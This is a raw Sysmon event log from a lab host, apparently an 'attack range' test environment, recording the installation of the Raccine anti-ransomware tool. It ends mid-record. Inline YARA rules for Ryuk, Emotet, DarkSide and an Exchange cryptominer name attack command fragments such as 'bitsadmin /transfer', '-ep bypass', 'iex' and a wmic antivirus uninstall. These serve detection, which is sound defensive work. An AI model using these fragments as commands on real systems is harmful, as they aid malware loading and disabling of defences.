""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896652Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:27.563{9DBE88B5-1133-61B1-63FF-000000000E02}364C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-uninstall.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896556Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:14.512{9DBE88B5-1126-61B1-5BFF-000000000E02}172C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /b ::: "C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{9DBE88B5-1126-61B1-5AFF-000000000E02}4708C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" 154100x80000000000000001896548Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:14.505{9DBE88B5-1126-61B1-5AFF-000000000E02}4708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896540Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:14.481{9DBE88B5-1126-61B1-59FF-000000000E02}1104C:\Windows\System32\cacls.exe10.0.14393.0 (rs1_release.160715-1616)Control ACLs ProgramMicrosoft® Windows® Operating SystemMicrosoft CorporationCACLS.EXE"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=5A28B3C94D93A367B370C80820942DC8,SHA256=1E7C610F63BA1E22F8CE1350DF98F0825A4A23328C15928BE67EE6E8B58E0290,IMPHASH=1084EC4809BB62FAB10FDFF1189E5BB3{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001896522Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localInvDBSetValue2021-12-08 20:10:14.405{9DBE88B5-C32E-61A8-1200-000000000E02}776C:\Windows\System32\svchost.exeHKU\S-1-5-21-4237553712-3540382794-1517851115-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.batBinary Data 154100x80000000000000001896513Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:14.409{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" "C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x80000000000000001896440Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:51.712{9DBE88B5-110F-61B1-56FF-000000000E02}6112C:\Program Files\Notepad++\notepad++.exe8.192Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat"C:\Windows\system32\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=40BE20589D819C3C9A40CC6F0D730560,SHA256=69652BC3169A746975C9BE917E80F4573BFC6E35844BCCC2AAE2621D9FF573A2,IMPHASH=3BC3FD4C1203B4D6795EAFD8E6CED030{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 15241500x80000000000000001896402Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.770{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\in-memory\gen_loaders.yar:Zone.Identifier2021-05-14 13:19:26.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896401Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.769{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\in-memory\gen_loaders.yar:Zone.Identifier2021-05-14 13:19:26.000 15241500x80000000000000001896400Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.769{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\in-memory\gen_loaders.yar2021-05-14 13:19:26.000MD5=84F49A433322336905BEDEFA80BCA2E7,SHA256=AA4E921356216E082F46222838E7DCCB2C3423282C27322F699ECD2E00C6029A,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896399Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.767{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\in-memory\gen_loaders.yar2021-12-08 20:09:37.767 11241100x80000000000000001896398Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.765{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\in-memory2021-12-08 20:09:37.765 15241500x80000000000000001896397Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.764{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac64.exe:Zone.Identifier2020-06-26 08:37:22.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896396Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.763{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac64.exe:Zone.Identifier2020-06-26 08:37:22.000 15241500x80000000000000001896395Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.747{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac64.exe2020-06-26 08:37:22.000MD5=DD9EAFEFEB540C79E33D405341271316,SHA256=4F7EB7510796D4A83935628C208F63C953631678D27E610D4D482BBEB1B33F4D,IMPHASH=B4DD2A010A677FC97D1684B7E1B33257- 254200x80000000000000001896394Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:37.745{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac64.exe2020-06-26 08:37:22.0002021-12-08 20:09:37.720 11241100x80000000000000001896393Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.720{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac64.exe2021-12-08 20:09:37.720 15241500x80000000000000001896392Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.719{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac32.exe:Zone.Identifier2020-06-26 08:33:42.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896391Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.719{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac32.exe:Zone.Identifier2020-06-26 08:33:42.000 15241500x80000000000000001896390Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.707{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac32.exe2020-06-26 08:33:42.000MD5=85AAD79E102C92C2366E1448E26A88C6,SHA256=54F709AD06437BBDAD56CAA66EBD9236DC1B20F69B9EEBB983AB99EF0BEE4257,IMPHASH=3CB7226C8A0711191C1BF5D99F4B0E59- 254200x80000000000000001896389Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:37.706{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac32.exe2020-06-26 08:33:42.0002021-12-08 20:09:37.687 11241100x80000000000000001896388Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.688{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yarac32.exe2021-12-08 20:09:37.687 15241500x80000000000000001896387Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.686{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara64.exe:Zone.Identifier2020-06-26 08:37:18.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896386Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.686{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara64.exe:Zone.Identifier2020-06-26 08:37:18.000 15241500x80000000000000001896385Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.669{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara64.exe2020-06-26 08:37:18.000MD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E- 254200x80000000000000001896383Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:37.667{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara64.exe2020-06-26 08:37:18.0002021-12-08 20:09:37.641 11241100x80000000000000001896382Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.641{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara64.exe2021-12-08 20:09:37.641 15241500x80000000000000001896381Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.637{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara32.exe:Zone.Identifier2020-06-26 08:33:40.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896380Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.637{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara32.exe:Zone.Identifier2020-06-26 08:33:40.000 15241500x80000000000000001896379Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.626{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara32.exe2020-06-26 08:33:40.000MD5=3C925B83553CB7C6178622583C400A0E,SHA256=E61F4B167E36DA4E2FD182BB6764C174954816E72B27F65D33AE302BC8FCC92A,IMPHASH=61CBBB703ED85FF24D9B2C249F07E8F4- 254200x80000000000000001896378Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10992021-12-08 20:09:37.624{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara32.exe2020-06-26 08:33:40.0002021-12-08 20:09:37.604 11241100x80000000000000001896377Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.605{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\yara32.exe2021-12-08 20:09:37.604 15241500x80000000000000001896376Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.604{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ryuk-commandlines.yar:Zone.Identifier2020-10-30 00:55:50.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896375Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.603{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ryuk-commandlines.yar:Zone.Identifier2020-10-30 00:55:50.000 15241500x80000000000000001896374Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.603{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ryuk-commandlines.yar2020-10-30 00:55:50.000MD5=6295C17ED7D8E37899E8C9F4D1A5182F,SHA256=3A7334E0F074949B24CB0C6AE1D60E2447BEC9E78D9ED6ABBF0112508E25C095,IMPHASH=00000000000000000000000000000000rule Ryuk_CmdLines { strings: /* Sandbox Report https://app.any.run/tasks/d41b5569-f3bd-409e-99b1-fc4c728d21aa/ */ $a1 = "net.exe" $a2 = "stop" fullword $a3 = " /y" $s1 = "audioendpointbuilder" fullword $s2 = "samss" fullword /* FireEye report https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html */ $ba1 = "process call create" $ba2 = "bitsadmin /transfer" $ba3 = "AppData" nocase $bx1 = "/transfer vVv" $bx2 = "temp\\vVv.exe" condition: all of ($a*) and 1 of ($s*) or all of ($ba*) or 1 of ($bx*) } 11241100x80000000000000001896373Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.601{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ryuk-commandlines.yar2021-12-08 20:09:37.601 15241500x80000000000000001896372Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.600{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\powershell_loaders.yar:Zone.Identifier2021-05-14 13:17:16.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896371Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.600{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\powershell_loaders.yar:Zone.Identifier2021-05-14 13:17:16.000 15241500x80000000000000001896370Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.600{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\powershell_loaders.yar2021-05-14 13:17:16.000MD5=A3DA4AE0C4939DB63A7E65A409375B3E,SHA256=97379E15046D7EE081E3B729193D3609E0679CAD719455A3B06F32C62791EADC,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896369Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.598{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\powershell_loaders.yar2021-12-08 20:09:37.598 15241500x80000000000000001896368Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.597{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_revil.yar:Zone.Identifier2020-12-10 19:18:58.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896367Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.596{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_revil.yar:Zone.Identifier2020-12-10 19:18:58.000 15241500x80000000000000001896366Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.596{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_revil.yar2020-12-10 19:18:58.000MD5=3685C5F3760B850367F9F170510A4C09,SHA256=6945E983DBB57FE8EE46713559393F12FFB35995A93755D6656F8DF79DA85587,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896365Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.594{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_revil.yar2021-12-08 20:09:37.594 15241500x80000000000000001896364Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.593{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_exchange_cryptominer.yar:Zone.Identifier2021-03-23 22:18:02.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896363Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.593{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_exchange_cryptominer.yar:Zone.Identifier2021-03-23 22:18:02.000 15241500x80000000000000001896362Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.593{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_exchange_cryptominer.yar2021-03-23 22:18:02.000MD5=8E5E8F275DEA9CA5B7C7A6B466EA6C87,SHA256=335AFB1B376EFB95C6304D75C090C50A1598B88EBB26799CAB00A2EFF3AD17E5,IMPHASH=00000000000000000000000000000000rule MAL_Exchange_CryptoMiner_Mar21_1 { meta: description = "Detects Cryptominer activity exploiting exchange vulnerability" author = "Florian Roth" date = "2021-03-16" reference = "https://twitter.com/ollieatnccgroup/status/1371840592246870023" score = 60 strings: $s1 = "wmic.exe product where" $s2 = "%AntiVirus%" $s3 = "call uninstall /noninteractive" condition: all of them } 11241100x80000000000000001896361Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.591{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_exchange_cryptominer.yar2021-12-08 20:09:37.591 15241500x80000000000000001896360Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.590{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_emotet.yar:Zone.Identifier2020-10-31 10:14:16.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896359Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.589{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_emotet.yar:Zone.Identifier2020-10-31 10:14:16.000 15241500x80000000000000001896358Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.589{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_emotet.yar2020-10-31 10:14:16.000MD5=91B84EC8BB0A4B6153392144D1A9BBBD,SHA256=02754A7F21D6667AA330CD3F00164F7C3EDD474267ACD882B66EF42C9BE59CDF,IMPHASH=00000000000000000000000000000000rule MAL_Emotet_MalDocs { meta: description = "Detects PowerShell invocation as used by Emotet MalDocs" author = "Florian Roth" date = "2020-10-21" score = 60 strings: /* Encoded Command */ $s1 = ".exe -ENCOD " ascii condition: 1 of them } 11241100x80000000000000001896357Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.587{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_emotet.yar2021-12-08 20:09:37.587 15241500x80000000000000001896356Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.586{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_darkside.yar:Zone.Identifier2021-05-14 13:17:16.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896355Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.586{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_darkside.yar:Zone.Identifier2021-05-14 13:17:16.000 15241500x80000000000000001896354Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.586{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_darkside.yar2021-05-14 13:17:16.000MD5=008207803640DD1E7F3A187C1D4BDD8D,SHA256=CE3A48E25A86E42C988CE73971923B7EC5F82AF99446EEB1FB1B6E3A6B641A00,IMPHASH=00000000000000000000000000000000rule MAL_DarkSide_May21 { meta: description = "Detects PowerShell invocation as used by DarkSide loader" author = "Florian Roth" date = "2021-05-11" reference = "https://www.varonis.com/blog/darkside-ransomware/" score = 60 strings: $ = " -ep bypass " ascii $ = "(0..61)|%{$s+=[char]" ascii $ = ";iex $" ascii condition: 2 of them } 11241100x80000000000000001896353Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.584{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\mal_darkside.yar2021-12-08 20:09:37.583 15241500x80000000000000001896352Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.583{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_ransomware_command_lines.yar:Zone.Identifier2021-01-03 15:16:16.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896351Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.582{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_ransomware_command_lines.yar:Zone.Identifier2021-01-03 15:16:16.000 15241500x80000000000000001896350Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 